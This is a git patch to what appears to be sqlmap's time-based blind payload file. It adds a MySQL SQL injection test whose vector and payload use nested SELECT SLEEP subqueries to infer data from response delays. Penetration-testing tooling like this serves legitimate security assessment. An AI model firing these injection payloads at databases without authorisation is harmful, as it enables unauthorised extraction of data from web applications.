From 35100557d6f78229e5dd74489b0b06b2f718dedf Mon Sep 17 00:00:00 2001
From: Ekzorcist <infosecurity@ya.ru>
Date: Sat, 9 Feb 2019 19:50:45 +0300
Subject: [PATCH] Add Burp Suite payload "(select_from(select(sleep(20)))a)"
 query custom sleep

---
 xml/payloads/time_blind.xml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml
index 6423a8050..f07186055 100644
--- a/xml/payloads/time_blind.xml
+++ b/xml/payloads/time_blind.xml
@@ -104,6 +104,26 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (query CUSTOM_1 SLEEP)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
         <stype>5</stype>